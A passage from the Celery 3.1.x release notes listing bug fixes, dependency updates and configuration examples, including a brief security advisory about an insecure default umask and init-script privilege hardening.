**Results**: Redis result backend now ensures all pipelines are cleaned up. Contributed by Justin Patrin. - **Results**: Redis result backend now allows for timeout to be set in the query portion of the result backend URL. For example ``CELERY_RESULT_BACKEND = 'redis://?timeout=10'`` Contributed by Justin Patrin. - **Results**: ``result.get`` now properly handles failures where the exception value is set to :const:`None` (Issue #2560). - **Prefork pool**: Fixed attribute error ``proc.dead``. - **Worker**: Fixed worker hanging when gossip/heartbeat disabled (Issue #1847). Fix contributed by Aaron Webber and Bryan Helmig. 
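To illustrate the :setting:`CELERY_ROUTES` fix in the 3.1.20 entries above, a sketch with placeholder task and queue names (per that fix, a plain queue name should work as the value; the dict form is the more common spelling):

.. code-block:: python

    CELERY_ROUTES = {
        'proj.tasks.add': 'math',                      # queue-name value
        'proj.tasks.send_email': {'queue': 'email'},   # equivalent dict form
    }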
- **Results**: MongoDB result backend now supports pymongo 3.x (Issue #2744). Fix contributed by Sukrit Khera. - **Results**: RPC/AMQP backends didn't deserialize exceptions properly (Issue #2691). Fix contributed by Sukrit Khera. - **Programs**: Fixed problem with :program:`celery amqp`'s ``basic_publish`` (Issue #2013). - **Worker**: Embedded beat now properly sets app for thread/process (Issue #2594). - **Documentation**: Many improvements and typos fixed. Contributions by: Carlos Garcia-Dubus D. Yu :github_user:`jerry` Jocelyn Delalande Josh Kupershmidt Juan Rossi :github_user:`kanemra` Paul Pearce Pavel Savchenko Sean Wang Seungha Kim Zhaorong Ma .. _version-3.1.18: 3.1.18 ====== :release-date: 2015-04-22 05:30 p.m. UTC :release-by: Ask Solem - **Requirements** - Now depends on :ref:`Kombu 3.0.25 `. - Now depends on :mod:`billiard` 3.3.0.20. - **Django**: Now supports Django 1.8 (Issue #2536). Fix contributed by Bence Tamas and Mickaël Penhard. - **Results**: MongoDB result backend now compatible with pymongo 3.0. Fix contributed by Fatih Sucu. - **Tasks**: Fixed bug only happening when a task has multiple callbacks (Issue #2515). Fix contributed by NotSqrt. - **Commands**: Preload options now support ``--arg value`` syntax. Fix contributed by John Anderson. - **Compat**: A typo caused ``celery.log.setup_logging_subsystem`` to be undefined. Fix contributed by Gunnlaugur Thor Briem. - **init-scripts**: The beat generic init-script now uses :file:`/bin/sh` instead of :command:`bash` (Issue #2496). Fix contributed by Jelle Verstraaten. - **Django**: Fixed a :exc:`TypeError` sometimes occurring in logging when validating models. Fix contributed by Alexander. - **Commands**: Worker now supports new :option:`--executable ` argument that can be used with :option:`celery worker --detach`. Contributed by Bert Vanderbauwhede. - **Canvas**: Fixed crash in chord unlock fallback task (Issue #2404). - **Worker**: Fixed rare crash occurring with :option:`--autoscale ` enabled (Issue #2411). - **Django**: Properly recycle worker Django database connections when the Django ``CONN_MAX_AGE`` setting is enabled (Issue #2453). Fix contributed by Luke Burden. .. _version-3.1.17: 3.1.17 ====== :release-date: 2014-11-19 03:30 p.m. UTC :release-by: Ask Solem .. admonition:: Don't enable the `CELERYD_FORCE_EXECV` setting! Please review your configuration and disable this option if you're using the RabbitMQ or Redis transport. Keeping this option enabled after 3.1 means the async based prefork pool will be disabled, which can easily cause instability. - **Requirements** - Now depends on :ref:`Kombu 3.0.24 `. Includes the new Qpid transport coming in Celery 3.2, backported to support those who may still require Python 2.6 compatibility. - Now depends on :mod:`billiard` 3.3.0.19. - ``celery[librabbitmq]`` now depends on librabbitmq 1.6.1. - **Task**: The timing of ETA/countdown tasks were off after the example ``LocalTimezone`` implementation in the Python documentation no longer works in Python 3.4. (Issue #2306). - **Task**: Raising :exc:`~celery.exceptions.Ignore` no longer sends ``task-failed`` event (Issue #2365). - **Redis result backend**: Fixed unbound local errors. Fix contributed by Thomas French. - **Task**: Callbacks wasn't called properly if ``link`` was a list of signatures (Issue #2350). - **Canvas**: chain and group now handles json serialized signatures (Issue #2076). - **Results**: ``.join_native()`` would accidentally treat the ``STARTED`` state as being ready (Issue #2326). 
This could lead to the chord callback being called with invalid arguments when using chords with the :setting:`CELERY_TRACK_STARTED` setting enabled. - **Canvas**: The ``chord_size`` attribute is now set for all canvas primitives, making sure more combinations will work with the ``new_join`` optimization for Redis (Issue #2339). - **Task**: Fixed problem with app not being properly propagated to ``trace_task`` in all cases. Fix contributed by :github_user:`kristaps`. - **Worker**: Expires from task message now associated with a timezone. Fix contributed by Albert Wang. - **Cassandra result backend**: Fixed problems when using detailed mode. When using the Cassandra backend in detailed mode, a regression caused errors when attempting to retrieve results. Fix contributed by Gino Ledesma. - **Mongodb Result backend**: Pickling the backend instance will now include the original URL (Issue #2347). Fix contributed by Sukrit Khera. - **Task**: Exception info wasn't properly set for tasks raising :exc:`~celery.exceptions.Reject` (Issue #2043). - **Worker**: Duplicates are now removed when loading the set of revoked tasks from the worker state database (Issue #2336). - **celery.contrib.rdb**: Fixed problems with ``rdb.set_trace`` calling stop from the wrong frame. Fix contributed by :github_user:`llllllllll`. - **Canvas**: ``chain`` and ``chord`` can now be immutable. - **Canvas**: ``chord.apply_async`` will now keep partial args set in ``self.args`` (Issue #2299). - **Results**: Small refactoring so that results are decoded the same way in all result backends. - **Logging**: The ``processName`` format was introduced in Python 2.6.2 so for compatibility this format is now excluded when using earlier versions (Issue #1644). .. _version-3.1.16: 3.1.16 ====== :release-date: 2014-10-03 06:00 p.m. UTC :release-by: Ask Solem - **Worker**: 3.1.15 broke :option:`-Ofair ` behavior (Issue #2286). This regression could result in all tasks executing in a single child process if ``-Ofair`` was enabled. - **Canvas**: ``celery.signature`` now properly forwards app argument in all cases. - **Task**: ``.retry()`` didn't raise the exception correctly when called without a current exception. Fix contributed by Andrea Rabbaglietti. - **Worker**: The ``enable_events`` remote control command disabled worker-related events by mistake (Issue #2272). Fix contributed by Konstantinos Koukopoulos. - **Django**: Adds support for Django 1.7 class names in INSTALLED_APPS when using ``app.autodiscover_tasks()`` (Issue #2248). - **Sphinx**: ``celery.contrib.sphinx`` now uses ``getfullargspec`` on Python 3 (Issue #2302). - **Redis/Cache Backends**: Chords will now run at most once if one or more tasks in the chord are executed multiple times for some reason. .. _version-3.1.15: 3.1.15 ====== :release-date: 2014-09-14 11:00 p.m. UTC :release-by: Ask Solem - **Django**: Now makes sure ``django.setup()`` is called before importing any task modules (Django 1.7 compatibility, Issue #2227) - **Results**: ``result.get()`` was misbehaving by calling ``backend.get_task_meta`` in a :keyword:`finally` call leading to AMQP result backend queues not being properly cleaned up (Issue #2245). .. _version-3.1.14: 3.1.14 ====== :release-date: 2014-09-08 03:00 p.m. UTC :release-by: Ask Solem - **Requirements** - Now depends on :ref:`Kombu 3.0.22 `. - **Init-scripts**: The generic worker init-scripts ``status`` command now gets an accurate pidfile list (Issue #1942). - **Init-scripts**: The generic beat script now implements the ``status`` command. 
    Contributed by John Whitlock.

- **Commands**: Multi now writes informational output to stdout
  instead of stderr.

- **Worker**: Now ignores not implemented error for ``pool.restart``
  (Issue #2153).

- **Task**: Retry no longer raises retry exception when executed in eager
  mode (Issue #2164).

- **AMQP Result backend**: Now ensures ``on_interval`` is called at least
  every second for blocking calls to properly propagate parent errors.

- **Django**: Compatibility with Django 1.7 on Windows (Issue #2126).

- **Programs**: :option:`--umask ` argument can now be specified in either
  octal (if starting with 0) or decimal.

.. _version-3.1.13:

3.1.13
======

Security Fixes
--------------

* [Security: `CELERYSA-0002`_] Insecure default umask.

    The built-in utility used to daemonize the Celery worker service sets
    an insecure umask by default (umask 0).

    This means that any files or directories created by the worker will
    end up having world-writable permissions.

    Special thanks to Red Hat for originally discovering and reporting the
    issue!

    This version will no longer set a default umask by default, so if unset
    the umask of the parent process will be used.

.. _`CELERYSA-0002`:
    https://github.com/celery/celery/tree/master/docs/sec/CELERYSA-0002.txt

News
----

- **Requirements**

    - Now depends on :ref:`Kombu 3.0.21 `.
    - Now depends on :mod:`billiard` 3.3.0.18.

- **App**: ``backend`` argument now also sets the
  :setting:`CELERY_RESULT_BACKEND` setting.

- **Task**: ``signature_from_request`` now propagates ``reply_to`` so that
  the RPC backend works with retried tasks (Issue #2113).

- **Task**: ``retry`` will no longer attempt to re-queue the task if sending
  the retry message fails.

    Unrelated exceptions being raised could cause a message loop, so it was
    better to remove this behavior.

- **Beat**: Accounts for standard 1ms drift by always waking up 0.010s
  earlier.

    This will adjust the latency so that the periodic tasks won't move
    1ms after every invocation.

- Documentation fixes

    Contributed by Yuval Greenfield, Lucas Wiman,
    :github_user:`nicholsonjf`.

- **Worker**: Removed an outdated assert statement that could lead to errors
  being masked (Issue #2086).

.. _version-3.1.12:

3.1.12
======
:release-date: 2014-06-09 10:12 p.m. UTC
:release-by: Ask Solem

- **Requirements**

    - Now depends on :ref:`Kombu 3.0.19 `.

- **App**: Connections weren't being closed after fork due to an error in the
  after fork handler (Issue #2055).

    This could manifest itself by causing framing errors when using RabbitMQ.
    (``Unexpected frame``).

- **Django**: ``django.setup()`` was being called too late when using Django
  1.7 (Issue #1802).

- **Django**: Fixed problems with event timezones when using Django
  (``Substantial drift``).

    Celery didn't take into account that Django modifies the
    ``time.timezone`` attributes and friends.

- **Canvas**: ``Signature.link`` now works when the link option is a scalar
  value (Issue #2019).

- **Prefork pool**: Fixed race conditions for when file descriptors are
  removed from the event loop.

    Fix contributed by Roger Hu.

- **Prefork pool**: Improved solution for dividing tasks between child
  processes.

    This change should improve performance when there are many child
    processes, and also decrease the chance that two subsequent tasks are
    written to the same child process.

- **Worker**: Now ignores unknown event types, instead of crashing.

    Fix contributed by Illes Solt.

- **Programs**: :program:`celery worker --detach` no longer closes open file
  descriptors when :envvar:`C_FAKEFORK` is used so that the worker's output
  can be seen.
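A minimal sketch of the 3.1.13 note above about the ``backend`` argument also setting :setting:`CELERY_RESULT_BACKEND` (both URLs are placeholders):

.. code-block:: python

    from celery import Celery

    # Passing ``backend`` here now also sets CELERY_RESULT_BACKEND, so the
    # result backend is consistent for the app and its configuration.
    app = Celery('proj', broker='amqp://', backend='redis://localhost/0')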
- **Programs**: The default working directory for :program:`celery worker --detach` is now the current working directory, not ``/``. - **Canvas**: ``signature(s, app=app)`` didn't upgrade serialized signatures to their original class (``subtask_type``) when the ``app`` keyword argument was used. - **Control**: The ``duplicate nodename`` warning emitted by control commands now shows the duplicate node name. - **Tasks**: Can now call ``ResultSet.get()`` on a result set without members. Fix contributed by Alexey Kotlyarov. - **App**: Fixed strange traceback mangling issue for ``app.connection_or_acquire``. - **Programs**: The :program:`celery multi stopwait` command is now documented in usage. - **Other**: Fixed cleanup problem with ``PromiseProxy`` when an error is raised while trying to evaluate the promise. - **Other**: The utility used to censor configuration values now handles non-string keys. Fix contributed by Luke Pomfrey. - **Other**: The ``inspect conf`` command didn't handle non-string keys well. Fix contributed by Jay Farrimond. - **Programs**: Fixed argument handling problem in :program:`celery worker --detach`. Fix contributed by Dmitry Malinovsky. - **Programs**: :program:`celery worker --detach` didn't forward working directory option (Issue #2003). - **Programs**: :program:`celery inspect registered` no longer includes the list of built-in tasks. - **Worker**: The ``requires`` attribute for boot steps weren't being handled correctly (Issue #2002). - **Eventlet**: The eventlet pool now supports the ``pool_grow`` and ``pool_shrink`` remote control commands. Contributed by Mher Movsisyan. - **Eventlet**: The eventlet pool now implements statistics for :program:``celery inspect stats``. Contributed by Mher Movsisyan. - **Documentation**: Clarified ``Task.rate_limit`` behavior. Contributed by Jonas Haag. - **Documentation**: ``AbortableTask`` examples now updated to use the new API (Issue #1993). - **Documentation**: The security documentation examples used an out of date import. Fix contributed by Ian Dees. - **Init-scripts**: The CentOS init-scripts didn't quote :envvar:`CELERY_CHDIR`. Fix contributed by :github_user:`ffeast`. .. _version-3.1.11: 3.1.11 ====== :release-date: 2014-04-16 11:00 p.m. UTC :release-by: Ask Solem - **Now compatible with RabbitMQ 3.3.0** You need to run Celery 3.1.11 or later when using RabbitMQ 3.3, and if you use the ``librabbitmq`` module you also have to upgrade to librabbitmq 1.5.0: .. code-block:: bash $ pip install -U librabbitmq - **Requirements**: - Now depends on :ref:`Kombu 3.0.15 `. - Now depends on `billiard 3.3.0.17`_. - Bundle ``celery[librabbitmq]`` now depends on :mod:`librabbitmq` 1.5.0. .. _`billiard 3.3.0.17`: https://github.com/celery/billiard/blob/master/CHANGES.txt - **Tasks**: The :setting:`CELERY_DEFAULT_DELIVERY_MODE` setting was being ignored (Issue #1953). - **Worker**: New :option:`celery worker --heartbeat-interval` can be used to change the time (in seconds) between sending event heartbeats. Contributed by Matthew Duggan and Craig Northway. - **App**: Fixed memory leaks occurring when creating lots of temporary app instances (Issue #1949). - **MongoDB**: SSL configuration with non-MongoDB transport breaks MongoDB results backend (Issue #1973). Fix contributed by Brian Bouterse. - **Logging**: The color formatter accidentally modified ``record.msg`` (Issue #1939). - **Results**: Fixed problem with task trails being stored multiple times, causing ``result.collect()`` to hang (Issue #1936, Issue #1943). 
- **Results**: ``ResultSet`` now implements a ``.backend`` attribute for compatibility with ``AsyncResult``. - **Results**: ``.forget()`` now also clears the local cache. - **Results**: Fixed problem with multiple calls to ``result._set_cache`` (Issue #1940). - **Results**: ``join_native`` populated result cache even if disabled. - **Results**: The YAML result serializer should now be able to handle storing exceptions. - **Worker**: No longer sends task error emails for expected errors (in ``@task(throws=(..., )))``. - **Canvas**: Fixed problem with exception deserialization when using the JSON serializer (Issue #1987). - **Eventlet**: Fixes crash when ``celery.contrib.batches`` attempted to cancel a non-existing timer (Issue #1984). - Can now import ``celery.version_info_t``, and ``celery.five`` (Issue #1968). .. _version-3.1.10: 3.1.10 ====== :release-date: 2014-03-22 09:40 p.m. UTC :release-by: Ask Solem - **Requirements**: - Now depends on :ref:`Kombu 3.0.14 `. - **Results**: Reliability improvements to the SQLAlchemy database backend. Previously the connection from the MainProcess was improperly shared with the workers. (Issue #1786) - **Redis:** Important note about events (Issue #1882). There's a new transport option for Redis that enables monitors to filter out unwanted events. Enabling this option in the workers will increase performance considerably: .. code-block:: python BROKER_TRANSPORT_OPTIONS = {'fanout_patterns': True} Enabling this option means that your workers won't be able to see workers with the option disabled (or is running an older version of Celery), so if you do enable it then make sure you do so on all nodes. See :ref:`redis-caveats`. This will be the default in Celery 3.2. - **Results**: The :class:`@AsyncResult` object now keeps a local cache of the final state of the task. This means that the global result cache can finally be disabled, and you can do so by setting :setting:`CELERY_MAX_CACHED_RESULTS` to :const:`-1`. The lifetime of the cache will then be bound to the lifetime of the result object, which will be the default behavior in Celery 3.2. - **Events**: The "Substantial drift" warning message is now logged once per node name only (Issue #1802). - **Worker**: Ability to use one log file per child process when using the prefork pool. This can be enabled by using the new ``%i`` and ``%I`` format specifiers for the log file name. See :ref:`worker-files-process-index`. - **Redis**: New experimental chord join implementation. This is an optimization for chords when using the Redis result backend, where the join operation is now considerably faster and using less resources than the previous strategy. The new option can be set in the result backend URL: .. code-block:: python CELERY_RESULT_BACKEND = 'redis://localhost?new_join=1' This must be enabled manually as it's incompatible with workers and clients not using it, so be sure to enable the option in all clients and workers if you decide to use it. - **Multi**: With ``-opt:index`` (e.g., ``-c:1``) the index now always refers to the position of a node in the argument list. This means that referring to a number will work when specifying a list of node names and not just for a number range: .. code-block:: bash celery multi start A B C D -c:1 4 -c:2-4 8 In this example ``1`` refers to node A (as it's the first node in the list). - **Signals**: The sender argument to ``Signal.connect`` can now be a proxy object, which means that it can be used with the task decorator (Issue #1873). 
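A one-line sketch of disabling the global result cache, as described in the 3.1.10 entries above:

.. code-block:: python

    # Rely on the new per-AsyncResult local cache instead of the global
    # result cache (planned to be the default behavior in Celery 3.2).
    CELERY_MAX_CACHED_RESULTS = -1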
- **Task**: A regression caused the ``queue`` argument to ``Task.retry`` to
  be ignored (Issue #1892).

- **App**: Fixed error message for :meth:`~@Celery.config_from_envvar`.

    Fix contributed by Dmitry Malinovsky.

- **Canvas**: Chords can now contain a group of other chords (Issue #1921).

- **Canvas**: Chords can now be combined when using the amqp result backend
  (a chord where the callback is also a chord).

- **Canvas**: Calling ``result.get()`` for a chain task will now complete
  even if one of the tasks in the chain is ``ignore_result=True``
  (Issue #1905).

- **Canvas**: Worker now also logs chord errors.

- **Canvas**: A chord task raising an exception will now result in any
  errbacks (``link_error``) attached to the chord callback also being called.

- **Results**: Reliability improvements to the SQLAlchemy database backend
  (Issue #1786).

    Previously the connection from the ``MainProcess`` was improperly
    inherited by child processes.

    Fix contributed by Ionel Cristian Mărieș.

- **Task**: Task callbacks and errbacks are now called using the group
  primitive.

- **Task**: ``Task.apply`` now properly sets ``request.headers``
  (Issue #1874).

- **Worker**: Fixed :exc:`UnicodeEncodeError` occurring when worker is
  started by :pypi:`supervisor`.

    Fix contributed by Codeb Fan.

- **Beat**: No longer attempts to upgrade a newly created database file
  (Issue #1923).

- **Beat**: New setting :setting:`CELERYBEAT_SYNC_EVERY` can be used to
  control file sync by specifying the number of tasks to send between
  each sync.

    Contributed by Chris Clark.

- **Commands**: :program:`celery inspect memdump` no longer crashes
  if the :mod:`psutil` module isn't installed (Issue #1914).

- **Worker**: Remote control commands now always accept json serialized
  messages (Issue #1870).

- **Worker**: Gossip will now drop any task related events it receives
  by mistake (Issue #1882).

.. _version-3.1.9:

3.1.9
=====
:release-date: 2014-02-10 06:43 p.m. UTC
:release-by: Ask Solem

- **Requirements**:

    - Now depends on :ref:`Kombu 3.0.12 `.

- **Prefork pool**: Better handling of exiting child processes.

    Fix contributed by Ionel Cristian Mărieș.

- **Prefork pool**: Now makes sure all file descriptors are removed
  from the hub when a process is cleaned up.

    Fix contributed by Ionel Cristian Mărieș.

- **New Sphinx extension**: for autodoc documentation of tasks:
  :mod:`celery.contrib.sphinx` (Issue #1833).

- **Django**: Now works with Django 1.7a1.

- **Task**: Task.backend is now a property that forwards to ``app.backend``
  if no custom backend has been specified for the task (Issue #1821).

- **Generic init-scripts**: Fixed bug in stop command.

    Fix contributed by Rinat Shigapov.

- **Generic init-scripts**: Fixed compatibility with GNU :manpage:`stat`.

    Fix contributed by Paul Kilgo.

- **Generic init-scripts**: Fixed compatibility with the minimal
  :program:`dash` shell (Issue #1815).

- **Commands**: The :program:`celery amqp basic.publish` command wasn't
  working properly.

    Fix contributed by Andrey Voronov.

- **Commands**: No longer emits an error message if the pidfile exists
  and the process is still alive (Issue #1855).

- **Commands**: Better error message for missing arguments to preload
  options (Issue #1860).

- **Commands**: :program:`celery -h` didn't work because of a bug in the
  argument parser (Issue #1849).

- **Worker**: Improved error message for message decoding errors.

- **Time**: Now properly parses the `Z` timezone specifier in
  ISO 8601 date strings.

    Fix contributed by Martin Davidsson.
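A minimal sketch of the new :setting:`CELERYBEAT_SYNC_EVERY` setting described above (the value is only an example):

.. code-block:: python

    # Sync the beat schedule file after every 10 sent tasks instead of
    # relying solely on the time-based default.
    CELERYBEAT_SYNC_EVERY = 10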
- **Worker**: Now uses the *negotiated* heartbeat value to calculate how often to run the heartbeat checks. - **Beat**: Fixed problem with beat hanging after the first schedule iteration (Issue #1822). Fix contributed by Roger Hu. - **Signals**: The header argument to :signal:`before_task_publish` is now always a dictionary instance so that signal handlers can add headers. - **Worker**: A list of message headers is now included in message related errors. .. _version-3.1.8: 3.1.8 ===== :release-date: 2014-01-17 10:45 p.m. UTC :release-by: Ask Solem - **Requirements**: - Now depends on :ref:`Kombu 3.0.10 `. - Now depends on `billiard 3.3.0.14`_. .. _`billiard 3.3.0.14`: https://github.com/celery/billiard/blob/master/CHANGES.txt - **Worker**: The event loop wasn't properly reinitialized at consumer restart which would force the worker to continue with a closed ``epoll`` instance on Linux, resulting in a crash. - **Events:** Fixed issue with both heartbeats and task events that could result in the data not being kept in sorted order. As a result this would force the worker to log "heartbeat missed" events even though the remote node was sending heartbeats in a timely manner. - **Results:** The pickle serializer no longer converts group results to tuples, and will keep the original type (*Issue #1750*). - **Results:** ``ResultSet.iterate`` is now pending deprecation. The method will be deprecated in version 3.2 and removed in version 3.3. Use ``result.get(callback=)`` (or ``result.iter_native()`` where available) instead. - **Worker**\|eventlet/gevent: A regression caused :kbd:`Control-c` to be ineffective for shutdown. - **Redis result backend:** Now using a pipeline to store state changes for improved performance. Contributed by Pepijn de Vos. - **Redis result backend:** Will now retry storing the result if disconnected. - **Worker**\|gossip: Fixed attribute error occurring when another node leaves. Fix contributed by Brodie Rao. - **Generic init-scripts:** Now runs a check at start-up to verify that any configuration scripts are owned by root and that they aren't world/group writable. The init-script configuration is a shell script executed by root, so this is a preventive measure to ensure that users don't leave this file vulnerable to changes by unprivileged users. .. note:: Note that upgrading Celery won't update the init-scripts, instead you need to manually copy the improved versions from the source distribution: https://github.com/celery/celery/tree/3.1/extra/generic-init.d - **Commands**: The :program:`celery purge` command now warns that the operation will delete all tasks and prompts the user for confirmation. A new :option:`-f ` was added that can be used to disable interactive mode. - **Task**: ``.retry()`` didn't raise the value provided in the ``exc`` argument when called outside of an error context (*Issue #1755*). - **Commands:** The :program:`celery multi` command didn't forward command line configuration to the target workers. The change means that multi will forward the special ``--`` argument and configuration content at the end of the arguments line to the specified workers. Example using command-line configuration to set a broker heartbeat from :program:`celery multi`: .. code-block:: bash $ celery multi start 1 -c3 -- broker.heartbeat=30 Fix contributed by Antoine Legrand. - **Canvas:** ``chain.apply_async()`` now properly forwards execution options. Fix contributed by Konstantin Podshumok. 
- **Redis result backend:** Now takes ``connection_pool`` argument that can be used to change the connection pool class/constructor.
- **Worker:** Now truncates very long arguments and keyword arguments logged by the pool at debug severity.
- **Worker:** The worker now closes all open files on :sig:`SIGHUP` (regression) (*Issue #1768*). Fix contributed by Brodie Rao.
- **Worker:** Will no longer accept remote control commands while the worker start-up phase is incomplete (*Issue #1741*).
- **Commands:** The output of the event dump utility (:program:`celery events -d`) can now be piped into other commands.
- **Documentation:** The RabbitMQ installation instructions for macOS were updated to use modern Homebrew practices. Contributed by Jon Chen.
- **Commands:** The :program:`celery inspect conf` utility now works.
- **Commands:** The :option:`--no-color ` argument was not respected by all commands (*Issue #1799*).
- **App:** Fixed rare bug with ``autodiscover_tasks()`` (*Issue #1797*).
- **Distribution:** The sphinx docs will now always add the parent directory to path so that the current Celery source code is used as a basis for API documentation (*Issue #1782*).
- **Documentation:** :pypi:`supervisor` examples contained an extraneous '-' in a :option:`--logfile ` argument example. Fix contributed by Mohammad Almeer.

.. _version-3.1.7:

3.1.7
=====
:release-date: 2013-12-17 06:00 p.m. UTC
:release-by: Ask Solem

.. _v317-important:

Important Notes
---------------

Init-script security improvements
---------------------------------

The generic init-scripts (for ``celeryd`` and ``celerybeat``) previously delegated the responsibility of dropping privileges to the target application; they now use ``su`` instead, so that the Python program isn't trusted with superuser privileges.

This isn't in reaction to any known exploit, but it will limit the possibility of a privilege escalation bug being abused in the future.

You have to upgrade the init-scripts manually from this directory: https://github.com/celery/celery/tree/3.1/extra/generic-init.d

AMQP result backend
~~~~~~~~~~~~~~~~~~~

The 3.1 release accidentally left the amqp backend configured to be non-persistent by default. Upgrading from 3.0 would give a "not equivalent" error when attempting to set or retrieve results for a task. That's unless you manually set the persistence setting::

    CELERY_RESULT_PERSISTENT = True

This version restores the previous value, so if you already forced the upgrade by removing the existing exchange you must either keep the configuration by setting ``CELERY_RESULT_PERSISTENT = False`` or delete the ``celeryresults`` exchange again.

Synchronous subtasks
~~~~~~~~~~~~~~~~~~~~

Tasks waiting for the result of a subtask will now emit a :exc:`RuntimeWarning` warning when using the prefork pool, and in 3.2 this will result in an exception being raised. It's not legal for tasks to block by waiting for subtasks as this is likely to lead to resource starvation and eventually deadlock when using the prefork pool (see also :ref:`task-synchronous-subtasks`).

If you really know what you're doing you can avoid the warning (and the future exception being raised) by moving the operation into a white-list block:
.. code-block:: python

    from celery.result import allow_join_result

    @app.task
    def misbehaving():
        result = other_task.delay()
        with allow_join_result():
            result.get()

Note also that if you wait for the result of a subtask in any form when using the prefork pool you must also disable the pool prefetching behavior with the worker :ref:`-Ofair option `.

.. _v317-fixes:

Fixes
-----

- Now depends on :ref:`Kombu 3.0.8 `.
- Now depends on :mod:`billiard` 3.3.0.13.
- Events: Fixed compatibility with non-standard json libraries that send floats as :class:`decimal.Decimal` (Issue #1731).
- Events: State worker objects now always define the attributes: ``active``, ``processed``, ``loadavg``, ``sw_ident``, ``sw_ver`` and ``sw_sys``.
- Worker: Now keeps count of the total number of tasks processed, not just by type (``all_active_count``).
- Init-scripts: Fixed problem with reading configuration file when the init-script is symlinked to a runlevel (e.g., ``S02celeryd``) (Issue #1740). This also removed a rarely used feature where you can symlink the script to provide alternative configurations. You instead copy the script and give it a new name, but perhaps a better solution is to provide arguments to ``CELERYD_OPTS`` to separate them:

  .. code-block:: bash

      CELERYD_NODES="X1 X2 Y1 Y2"
      CELERYD_OPTS="-A:X1 x -A:X2 x -A:Y1 y -A:Y2 y"

- Fallback chord unlock task is now always called after the chord header (Issue #1700). This means that the unlock task won't be started if there's an error sending the header.
- Celery command: Fixed problem with arguments for some control commands. Fix contributed by Konstantin Podshumok.
- Fixed bug in ``utcoffset`` where the offset when in DST would be completely wrong (Issue #1743).
- Worker: Errors occurring while attempting to serialize the result of a task will now cause the task to be marked with failure and a :class:`kombu.exceptions.EncodingError` error. Fix contributed by Ionel Cristian Mărieș.
- Worker with :option:`-B ` argument didn't properly shut down the beat instance.
- Worker: The ``%n`` and ``%h`` formats are now also supported by the :option:`--logfile `, :option:`--pidfile ` and :option:`--statedb ` arguments. Example:

  .. code-block:: bash

      $ celery -A proj worker -n foo@%h --logfile=%n.log --statedb=%n.db

- Redis/Cache result backends: Will now time out if keys are evicted while trying to join a chord.
- The fallback unlock chord task now raises :exc:`Retry` so that the retry event is properly logged by the worker.
- Multi: Will no longer apply Eventlet/gevent monkey patches (Issue #1717).
- Redis result backend: Now supports UNIX sockets. Like the Redis broker transport the result backend now also supports using ``redis+socket:///tmp/redis.sock`` URLs (see the configuration sketch below). Contributed by Alcides Viamontes Esquivel.
- Events: Events sent by clients were mistaken for worker related events (Issue #1714). For ``events.State`` the tasks now have a ``Task.client`` attribute that's set when a ``task-sent`` event is being received. Also, a client's logical clock isn't in sync with the cluster so they live in a "time bubble." So for this reason monitors will no longer attempt to merge with the clock of an event sent by a client, instead it will fake the value by using the current clock with a skew of -1.
- Prefork pool: The method used to find terminated processes was flawed in that it didn't also take into account missing ``popen`` objects.
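A minimal configuration sketch for the UNIX socket support mentioned above, using the old-style 3.1 setting name and an assumed socket path:

.. code-block:: python

    # celeryconfig.py -- point the Redis result backend at a local
    # UNIX socket instead of a TCP host/port
    CELERY_RESULT_BACKEND = 'redis+socket:///tmp/redis.sock'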
- Canvas: ``group`` and ``chord`` now work with anon signatures as long as the group/chord object is associated with an app instance (Issue #1744). You can pass the app by using ``group(..., app=app)``.

.. _version-3.1.6:

3.1.6
=====
:release-date: 2013-12-02 06:00 p.m. UTC
:release-by: Ask Solem

- Now depends on :mod:`billiard` 3.3.0.10.
- Now depends on :ref:`Kombu 3.0.7 `.
- Fixed problem where Mingle caused the worker to hang at start-up (Issue #1686).
- Beat: Would attempt to drop privileges twice (Issue #1708).
- Windows: Fixed error with ``geteuid`` not being available (Issue #1676).
- Tasks can now provide a list of expected error classes (Issue #1682). The list should only include errors that the task is expected to raise during normal operation::

      @task(throws=(KeyError, HttpNotFound))

  What happens when an exception is raised depends on the type of error:

  - Expected errors (included in ``Task.throws``) will be logged using severity ``INFO``, and traceback is excluded.
  - Unexpected errors will be logged using severity ``ERROR``, with traceback included.

- Cache result backend now compatible with Python 3 (Issue #1697).
- CentOS init-script: Now compatible with SysV style init symlinks. Fix contributed by Jonathan Jordan.
- Events: Fixed problem when task name isn't defined (Issue #1710). Fix contributed by Mher Movsisyan.
- Task: Fixed unbound local errors (Issue #1684). Fix contributed by Markus Ullmann.
- Canvas: Now unrolls groups with only one task (optimization) (Issue #1656).
- Task: Fixed problem with ETA and timezones. Fix contributed by Alexander Koval.
- Django: Worker now performs model validation (Issue #1681).
- Task decorator now emits less confusing errors when used with incorrect arguments (Issue #1692).
- Task: New method ``Task.send_event`` can be used to send custom events to Flower and other monitors (see the sketch below).
- Fixed a compatibility issue with non-abstract task classes.
- Events from clients now use the new node name format (``gen@``).
- Fixed rare bug with Callable not being defined at interpreter shutdown (Issue #1678). Fix contributed by Nick Johnson.
- Fixed Python 2.6 compatibility (Issue #1679).

.. _version-3.1.5:

3.1.5
=====
:release-date: 2013-11-21 06:20 p.m. UTC
:release-by: Ask Solem

- Now depends on :ref:`Kombu 3.0.6 `.
- Now depends on :mod:`billiard` 3.3.0.8.
- App: ``config_from_object`` is now lazy (Issue #1665).
- App: ``autodiscover_tasks`` is now lazy. Django users should now wrap access to the settings object in a lambda::

      app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)

  This ensures that the settings object isn't prepared prematurely.

- Fixed regression for :option:`--app ` argument experienced by some users (Issue #1653).
- Worker: Now respects the :option:`--uid ` and :option:`--gid ` arguments even if :option:`--detach ` isn't enabled.
- Beat: Now respects the :option:`--uid ` and :option:`--gid ` arguments even if :option:`--detach ` isn't enabled.
- Python 3: Fixed unorderable error occurring with the worker :option:`-B ` argument enabled.
- ``celery.VERSION`` is now a named tuple.
- ``maybe_signature(list)`` is now applied recursively (Issue #1645).
- ``celery shell`` command: Fixed ``IPython.frontend`` deprecation warning.
- The default app no longer includes the built-in fix-ups. This fixes a bug where ``celery multi`` would attempt to load the Django settings module before entering the target working directory.
- The Django daemonization tutorial was changed. Users no longer have to explicitly export ``DJANGO_SETTINGS_MODULE`` in :file:`/etc/default/celeryd` when the new project layout is used.
- Redis result backend: expiry value can now be 0 (Issue #1661).
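A hypothetical sketch of the ``Task.send_event`` method from the 3.1.6 notes above; the event type and fields are made-up examples, and a monitor would need to know how to interpret them:

.. code-block:: python

    @app.task(bind=True)
    def import_rows(self, rows):
        for i, row in enumerate(rows):
            # send a custom event that Flower or another monitor can display
            self.send_event('task-progress', current=i, total=len(rows))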
- Censoring settings now accounts for non-string keys (Issue #1663).
